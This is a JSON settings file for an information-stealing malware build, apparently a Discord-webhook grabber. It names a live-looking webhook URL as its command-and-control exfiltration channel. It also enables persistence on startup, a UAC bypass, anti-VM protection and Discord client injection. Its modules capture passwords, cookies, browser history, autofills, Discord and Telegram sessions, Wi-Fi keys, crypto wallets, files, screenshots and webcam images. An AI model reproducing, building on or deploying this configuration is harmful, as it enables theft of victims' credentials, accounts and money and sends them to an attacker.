{
    "settings": {
        "c2": [
            0,
            "https://discordapp.com/api/webhooks/1135264125296054272/ysS1mDGlMVT5hPjTnB7GT3fB_woVUKDJIvlyJsbctdBExK0bVpizdhCAmmlmZoBuTtDd"
        ],
        "mutex": "O8PgsPg0snN2LeKM",
        "pingme": true,
        "vmprotect": true,
        "startup": true,
        "melt": false,
        "uacBypass": true,
        "archivePassword": "blank",
        "consoleMode": 0,
        "debug": false,
        "pumpedStubSize": 0
    },
    "modules": {
        "captureWebcam": true,
        "capturePasswords": true,
        "captureCookies": true,
        "captureHistory": true,
        "captureAutofills": true,
        "captureDiscordTokens": true,
        "captureGames": true,
        "captureWifiPasswords": true,
        "captureSystemInfo": true,
        "captureScreenshot": true,
        "captureTelegramSession": true,
        "captureCommonFiles": true,
        "captureWallets": true,
        "fakeError": [
            false,
            [
                "",
                "",
                0
            ]
        ],
        "blockAvSites": false,
        "discordInjection": true
    }
}